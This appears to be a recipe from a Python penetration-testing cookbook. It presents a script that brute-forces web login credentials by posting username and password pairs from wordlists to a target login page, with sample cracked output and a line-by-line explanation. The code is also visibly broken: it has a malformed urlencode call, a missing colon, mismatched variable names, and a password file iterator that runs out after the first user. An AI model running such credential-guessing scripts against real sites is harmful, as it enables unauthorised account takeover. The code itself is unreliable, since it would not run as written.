To be able to use this recipe, you will need a list of usernames that you wish to test and also a list of passwords. While this is not the true definition of brute forcing, it will lower the number of combinations that you will be testing.

The following code shows an example of how to implement this recipe:

#brute force passwords
import sys
import urllib
import urllib2

if len(sys.argv) !=3:
    print "usage: %s userlist passwordlist" % (sys.argv[0])
    sys.exit(0)

filename1=str(sys.argv[1])
filename2=str(sys.argv[2])
userlist = open(filename1,'r')
passwordlist = open(filename2,'r')
url = "http://www.vulnerablesite.com/login.html"
foundusers = []
FailStr="Incorrect User or Password"

for user in userlist:
  for password in passwordlist:
    data = urllib.urlencode({"username="user&"password="password})
    request = urllib2.urlopen(url,data)
    response = request.read()
    if(response.find(FailStr)<0)
      foundcreds.append(user+":"+password)
    request.close()

if len(foundcreds)>0:
  print "Found User and Password combinations:\n"
  for name in foundcreds:
    print name+"\n"
else:
  print "No users found\n"

The following shows an example of the output produced when the script is run:

python bruteforcepasswords.py userlists.txt passwordlist.txt

Found User and Password combinations:

root:toor

angela:trustno1

bob:password123

john:qwerty

After the initial importing of the necessary modules and checking the system arguments, we set up password checking:

filename1=str(sys.argv[1])
filename2=str(sys.argv[2])
userlist = open(filename1,'r')
passwordlist = open(filename2,'r')

The filename arguments are stored in variables, which are then opened. The r variable means that we are opening these files as read-only.

We also specify our target and initialize an array to store any valid credentials that we find:

url = "http://www.vulnerablesite.com/login.html"
foundusers = []
FailStr="Incorrect User or Password"

The FailStr variable in the preceding code is just to make our lives easier by having a short variable name to type instead of typing out the entire string.

The main course of this recipe lies within a nested loop in which our automated password checking is carried out:

for user in userlist:
  for password in passwordlist:
    data = urllib.urlencode({"username="user&"password="password })
    request = urllib2.urlopen(url,data)
    response = request.read()
    if(response.find(FailStr)<0)
      foundcreds.append(user+":"+password)
    request.close()

Within this loop, a request is sent including the username and password as parameters. If the response doesn't contain the string indicating that the username and password combination is invalid, then we know that we have a valid set of credentials. We then add these credentials to the array that we created earlier.

Once all the username and password combinations have been tried, we then check the array to see whether there are any credentials. If so, we print out the credentials. If not, we print out a sad message informing us that we have not found anything:

if len(foundcreds)>0:
  print "Found User and Password combinations:\n"
  for name in foundcreds:
    print name+"\n"
else:
  print "No users found\n"

If you're looking to find usernames, you may also want to make use of the Checking username validity and the Brute forcing usernames recipes.